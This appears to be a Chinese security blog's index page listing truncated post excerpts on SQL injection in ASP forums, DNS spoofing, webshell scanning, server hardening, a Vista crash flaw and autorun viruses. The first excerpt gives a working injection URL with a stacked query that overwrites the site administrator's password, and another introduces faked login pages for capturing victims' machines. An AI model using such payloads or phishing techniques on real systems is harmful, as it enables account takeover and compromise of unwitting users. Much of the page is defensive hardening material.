摘要： http://192.168.1.254/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=3);%20declare%20@a%20sysname%20select%20@a=0x3300%20update%20pe_admin%20set%20password=@a%20where%20id=1--); declare @a... 阅读全文

摘要： 1、 bbsxp 2007斑竹权限注射 moderation.asp中的这些代码if Request.ServerVariables("Request_method") = "POST" thenselect case Request.Form("Item")case "BatchDel"IsDel=Request.Form("IsDel")for each ho in Request.Form(... 阅读全文

摘要： 概述：什么是DNS欺骗？DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解，让我们先来看一个例子。如果你想用浏览器去google搜索一些信息，毫无疑问的你会在地址栏里输入 www.google.com的网址然后回车。那么在这背后又有什么事情正在进行着呢？一般而言，你的浏览器将会向DNS服务器发送一个请求，从而要求得到与www.google.com相匹配的IP地址，DNS服务器则会告诉你的... 阅读全文

摘要： /Files/allyesno/safe.rar本软件主要作为服务器的安全设置使用,以及个人机增加安全设置和防范脚本病毒使用。对于服务器的设置主要用于防范现在流行的脚本木马，从而提高服务器的安全性。软件的实现是通过卸载木马常使用的几个主要组件、修改组件名、设置磁盘权限、设置目录权限、黑客常使用的系统文件权限（如cmd.exe、net.exe、net1.exe等）、对于一些黑客提权的目录也作了权限设... 阅读全文

摘要： 本程序通杀:ASP ASPX PHP CGI JSP VBS 等脚本WebShell并能查出99%加密过的脚本WebShell后来发现..精度越高误杀越高...基本做到宁误扫三千不放过1马~其实是利用串判断.原理很简单.有很多人向偶要代码.想到人家ScanWebshell都贡献出来了~偶要是不贡献出来就不厚道咯.以下是全部代码. CODE: Private Declare Function... 阅读全文

摘要： 文章作者:冷月孤枫 备注：QQ：89224874 个人主页：http://www.cnblogs.com/allyesno/ 兵法有云：知己知彼，百战不殆。同样我们抓肉鸡也要这样，首先我们应确立这次的目标“刚刚学习网页制作的爱好者，对于免费空间无限的渴望者”。这次我们的工作主要放在页面的伪造上，加上恰当的衔接，使其... 阅读全文

摘要： 这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以建立一个站点cert.ecjtu.jx.cn为例，跟大家共同探讨虚拟主机配置问题。 一、建立Windows用户 为每个网站单独设置windows用户帐号cert，删除帐号的User组，将cert加入Guest用户组。将用户不能更改密码，密码永不过期两个选项选上。 二、设置文件夹权限 1、设置非站点相关目录权限 ... 阅读全文

摘要： 【eNet硅谷动力消息】据国外媒体报道，微软的新一代操作系统Windows Vista日前曝出了一处致命漏洞，在10秒钟内即可让系统崩溃。 众所周知，Windows Vista的最大卖点之一就是其安全性。微软董事长比尔·盖茨也曾表示，微软在Vista的安全方面下了很大功夫，并与其他安全产品做了详尽的对比。 而事实也似乎证实了与此前的Windows系统相比，Windows Vista的安全性... 阅读全文

摘要： from：网络autorun.inf类病毒和木马相信大家都中过标 一般形式以下载者类木马较为明显 下面ZZ一些方法 希望对大家有用 可以自己测试下 引用 iamcj 原创在前面的Make a anti-autorun batch中，我们讨论了如何通过禁止Shell Hardware Detection服务的方式，来屏蔽光盘/优盘插入时候的自动运行，转载到cnbeta之后，也有相当多的讨论，去掉... 阅读全文

摘要： Injection Post Html-----孤独包子The input and output textBY 孤独包子[%5C] 阅读全文